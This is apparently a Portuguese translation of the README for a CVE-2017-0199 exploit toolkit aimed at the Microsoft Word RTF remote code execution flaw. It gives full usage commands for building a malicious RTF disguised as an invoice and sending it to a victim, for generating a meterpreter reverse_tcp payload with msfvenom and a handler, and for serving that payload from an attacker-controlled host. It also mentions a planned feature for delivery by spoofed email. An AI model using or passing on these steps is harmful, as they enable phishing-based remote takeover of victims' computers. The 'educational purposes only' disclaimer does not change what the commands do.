
O Exploit toolkit CVE-2017-0199 - v2.0 é um prático script Python que oferece uma maneira rápida e eficaz de explorar o RCE do Microsoft RTF. Ele pode gerar um arquivo RTF malicioso e entregar metasploit / meterpreter / qualquer outro payload à vítima sem nenhuma configuração complexa.
O kit de exploração CVE-2017-0199 - v2.0 é um script python prático que fornece uma maneira rápida e eficaz de explorar o RCE do Microsoft RTF. Ele pode gerar um arquivo RTF malicioso e entregar o payload do metasploit / meterpreter à vítima sem qualquer configuração complexa.
Introduziu as seguintes capacidades ao script
- Gerar arquivo RTF malicioso usando o kit
- Executar o kit em modo de exploração como um pequeno servidor HTA + Web
Versão: Python versão 2.7.13
Trabalhando no seguinte recurso
- Enviar automaticamente o RTF malicioso gerado para a vítima usando falsificação de email
Passo 1: Gere o arquivo RTF malicioso usando o seguinte comando e envie para a vítima
Sintaxe:
# python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
Exemplo:
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
Passo 2 (Opcional, se usar Payload MSF): Gere o payload do metasploit e inicie o handler
Exemplo:
Gerar Payload:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
Iniciar Handler:
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
Passo 3: Inicie o kit em modo de exploração para entregar os payloads
Sintaxe:
# python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
Exemplo:
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-0199_toolkit.py -h
Isso é um kit prático para explorar o CVE-2017-0199 (RCE do Microsoft Word RTF)
Modos:
-M gen Gerar apenas arquivo RTF malicioso
Gerar arquivo RTF malicioso:
-w <Filename.rtf> Nome do arquivo RTF malicioso (Compartilhe este arquivo com a vítima).
-u <http://attacker.com/test.hta> O caminho para um arquivo hta. Normalmente, isso deve ser um domínio ou IP onde esta ferramenta está em execução.
Por exemplo, http://attackerip.com/test.hta (Esta URL será incluída no arquivo RTF malicioso e
será solicitada quando a vítima abrir o arquivo RTF malicioso.
-M exp Iniciar modo de exploração
Exploração:
-p <TCP port:Default 80> Número da porta local.
-e <http://attacker.com/shell.exe> O caminho de um arquivo executável / shell meterpreter / payload que precisa ser executado no alvo.
-l </tmp/shell.exe> Caminho local de um arquivo executável / shell meterpreter / payload (Se o payload estiver hospedado localmente).
Este programa é APENAS para fins educacionais. Não o use sem permissão. O aviso legal usual se aplica, especialmente o fato de que eu (bhdresh) não sou responsável por quaisquer danos causados pelo uso direto ou indireto das informações ou funcionalidades fornecidas por esses programas. O autor ou qualquer provedor de Internet NÃO assume nenhuma responsabilidade pelo conteúdo ou uso indevido desses programas ou quaisquer derivados deles. Ao usar este programa, você aceita o fato de que qualquer dano (perda de dados, travamento do sistema, comprometimento do sistema, etc.) causado pelo uso desses programas não é de responsabilidade de bhdresh.
@nixawk pela amostra RTF, @bhdresh
Obviamente, não sou um desenvolvedor em tempo integral, então espere alguns contratempos
Por favor, reporte erros e problemas para [email protected]